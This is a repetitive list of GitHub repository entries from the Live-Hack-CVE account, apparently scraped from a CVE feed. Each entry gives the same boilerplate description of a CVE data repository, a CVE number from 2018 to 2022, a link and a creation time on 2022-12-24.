**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41833](https://github.com/Live-Hack-CVE/CVE-2022-41833) create time: 2022-12-24T09:47:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43400 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43400](https://github.com/Live-Hack-CVE/CVE-2022-43400) create time: 2022-12-24T09:47:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41835](https://github.com/Live-Hack-CVE/CVE-2022-41835) create time: 2022-12-24T09:47:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41836](https://github.com/Live-Hack-CVE/CVE-2022-41836) create time: 2022-12-24T09:47:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41983](https://github.com/Live-Hack-CVE/CVE-2022-41983) create time: 2022-12-24T09:46:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39259](https://github.com/Live-Hack-CVE/CVE-2022-39259) create time: 2022-12-24T09:46:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23462](https://github.com/Live-Hack-CVE/CVE-2022-23462) create time: 2022-12-24T09:46:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40690](https://github.com/Live-Hack-CVE/CVE-2022-40690) create time: 2022-12-24T09:45:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31090 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31090](https://github.com/Live-Hack-CVE/CVE-2022-31090) create time: 2022-12-24T09:44:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36122](https://github.com/Live-Hack-CVE/CVE-2022-36122) create time: 2022-12-24T09:44:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39272](https://github.com/Live-Hack-CVE/CVE-2022-39272) create time: 2022-12-24T09:44:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41799](https://github.com/Live-Hack-CVE/CVE-2022-41799) create time: 2022-12-24T09:42:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3624](https://github.com/Live-Hack-CVE/CVE-2022-3624) create time: 2022-12-24T09:42:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39313](https://github.com/Live-Hack-CVE/CVE-2022-39313) create time: 2022-12-24T09:42:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41796 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41796](https://github.com/Live-Hack-CVE/CVE-2022-41796) create time: 2022-12-24T09:42:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3636](https://github.com/Live-Hack-CVE/CVE-2022-3636) create time: 2022-12-24T09:41:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39305](https://github.com/Live-Hack-CVE/CVE-2022-39305) create time: 2022-12-24T09:41:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22640](https://github.com/Live-Hack-CVE/CVE-2022-22640) create time: 2022-12-24T09:41:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36368](https://github.com/Live-Hack-CVE/CVE-2022-36368) create time: 2022-12-24T09:40:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39314](https://github.com/Live-Hack-CVE/CVE-2022-39314) create time: 2022-12-24T09:40:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40984](https://github.com/Live-Hack-CVE/CVE-2022-40984) create time: 2022-12-24T09:39:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41986](https://github.com/Live-Hack-CVE/CVE-2022-41986) create time: 2022-12-24T09:39:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18585](https://github.com/Live-Hack-CVE/CVE-2018-18585) create time: 2022-12-24T09:02:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18584](https://github.com/Live-Hack-CVE/CVE-2018-18584) create time: 2022-12-24T09:02:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16758 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16758](https://github.com/Live-Hack-CVE/CVE-2018-16758) create time: 2022-12-24T09:02:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16738](https://github.com/Live-Hack-CVE/CVE-2018-16738) create time: 2022-12-24T09:02:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16737](https://github.com/Live-Hack-CVE/CVE-2018-16737) create time: 2022-12-24T09:02:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3839](https://github.com/Live-Hack-CVE/CVE-2018-3839) create time: 2022-12-24T09:02:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3837](https://github.com/Live-Hack-CVE/CVE-2018-3837) create time: 2022-12-24T09:02:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7666 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7666](https://github.com/Live-Hack-CVE/CVE-2019-7666) create time: 2022-12-24T09:07:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7281](https://github.com/Live-Hack-CVE/CVE-2019-7281) create time: 2022-12-24T09:07:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7671 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7671](https://github.com/Live-Hack-CVE/CVE-2019-7671) create time: 2022-12-24T09:06:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7280](https://github.com/Live-Hack-CVE/CVE-2019-7280) create time: 2022-12-24T09:06:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10697](https://github.com/Live-Hack-CVE/CVE-2020-10697) create time: 2022-12-24T09:04:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0427](https://github.com/Live-Hack-CVE/CVE-2020-0427) create time: 2022-12-24T09:04:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10627](https://github.com/Live-Hack-CVE/CVE-2020-10627) create time: 2022-12-24T09:04:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25704](https://github.com/Live-Hack-CVE/CVE-2020-25704) create time: 2022-12-24T09:04:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36385](https://github.com/Live-Hack-CVE/CVE-2020-36385) create time: 2022-12-24T09:02:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25643](https://github.com/Live-Hack-CVE/CVE-2020-25643) create time: 2022-12-24T09:02:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14314](https://github.com/Live-Hack-CVE/CVE-2020-14314) create time: 2022-12-24T09:01:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14409](https://github.com/Live-Hack-CVE/CVE-2020-14409) create time: 2022-12-24T09:01:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24394](https://github.com/Live-Hack-CVE/CVE-2020-24394) create time: 2022-12-24T09:01:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25656](https://github.com/Live-Hack-CVE/CVE-2020-25656) create time: 2022-12-24T09:01:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2894](https://github.com/Live-Hack-CVE/CVE-2020-2894) create time: 2022-12-24T08:57:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2696](https://github.com/Live-Hack-CVE/CVE-2020-2696) create time: 2022-12-24T08:56:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2617](https://github.com/Live-Hack-CVE/CVE-2020-2617) create time: 2022-12-24T08:56:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2642](https://github.com/Live-Hack-CVE/CVE-2020-2642) create time: 2022-12-24T08:56:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2656](https://github.com/Live-Hack-CVE/CVE-2020-2656) create time: 2022-12-24T08:56:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2559](https://github.com/Live-Hack-CVE/CVE-2020-2559) create time: 2022-12-24T08:26:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2592](https://github.com/Live-Hack-CVE/CVE-2020-2592) create time: 2022-12-24T08:26:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2688 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2688](https://github.com/Live-Hack-CVE/CVE-2020-2688) create time: 2022-12-24T08:26:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2557](https://github.com/Live-Hack-CVE/CVE-2020-2557) create time: 2022-12-24T08:26:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2558](https://github.com/Live-Hack-CVE/CVE-2020-2558) create time: 2022-12-24T08:26:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2556](https://github.com/Live-Hack-CVE/CVE-2020-2556) create time: 2022-12-24T08:26:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2552](https://github.com/Live-Hack-CVE/CVE-2020-2552) create time: 2022-12-24T08:26:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2555](https://github.com/Live-Hack-CVE/CVE-2020-2555) create time: 2022-12-24T08:26:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2549](https://github.com/Live-Hack-CVE/CVE-2020-2549) create time: 2022-12-24T08:25:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2551](https://github.com/Live-Hack-CVE/CVE-2020-2551) create time: 2022-12-24T08:25:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2550](https://github.com/Live-Hack-CVE/CVE-2020-2550) create time: 2022-12-24T08:25:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2519](https://github.com/Live-Hack-CVE/CVE-2020-2519) create time: 2022-12-24T08:25:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2527](https://github.com/Live-Hack-CVE/CVE-2020-2527) create time: 2022-12-24T08:25:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2516](https://github.com/Live-Hack-CVE/CVE-2020-2516) create time: 2022-12-24T08:25:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2518](https://github.com/Live-Hack-CVE/CVE-2020-2518) create time: 2022-12-24T08:25:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38460](https://github.com/Live-Hack-CVE/CVE-2021-38460) create time: 2022-12-24T09:07:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38454](https://github.com/Live-Hack-CVE/CVE-2021-38454) create time: 2022-12-24T09:07:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38442](https://github.com/Live-Hack-CVE/CVE-2021-38442) create time: 2022-12-24T09:07:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38436](https://github.com/Live-Hack-CVE/CVE-2021-38436) create time: 2022-12-24T09:07:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38161](https://github.com/Live-Hack-CVE/CVE-2021-38161) create time: 2022-12-24T09:07:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24752](https://github.com/Live-Hack-CVE/CVE-2021-24752) create time: 2022-12-24T09:07:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31349](https://github.com/Live-Hack-CVE/CVE-2021-31349) create time: 2022-12-24T09:07:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32726 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32726](https://github.com/Live-Hack-CVE/CVE-2021-32726) create time: 2022-12-24T09:07:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31356](https://github.com/Live-Hack-CVE/CVE-2021-31356) create time: 2022-12-24T09:07:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32731](https://github.com/Live-Hack-CVE/CVE-2021-32731) create time: 2022-12-24T09:06:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32707](https://github.com/Live-Hack-CVE/CVE-2021-32707) create time: 2022-12-24T09:06:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21304](https://github.com/Live-Hack-CVE/CVE-2021-21304) create time: 2022-12-24T09:06:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21297](https://github.com/Live-Hack-CVE/CVE-2021-21297) create time: 2022-12-24T09:06:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32656](https://github.com/Live-Hack-CVE/CVE-2021-32656) create time: 2022-12-24T09:06:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32658 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32658](https://github.com/Live-Hack-CVE/CVE-2021-32658) create time: 2022-12-24T09:06:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32770](https://github.com/Live-Hack-CVE/CVE-2021-32770) create time: 2022-12-24T09:06:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32760 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32760](https://github.com/Live-Hack-CVE/CVE-2021-32760) create time: 2022-12-24T09:06:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21303](https://github.com/Live-Hack-CVE/CVE-2021-21303) create time: 2022-12-24T09:06:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21272](https://github.com/Live-Hack-CVE/CVE-2021-21272) create time: 2022-12-24T09:06:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21964 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21964](https://github.com/Live-Hack-CVE/CVE-2021-21964) create time: 2022-12-24T09:05:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32791](https://github.com/Live-Hack-CVE/CVE-2021-32791) create time: 2022-12-24T09:05:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32829 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32829](https://github.com/Live-Hack-CVE/CVE-2021-32829) create time: 2022-12-24T09:05:53Z

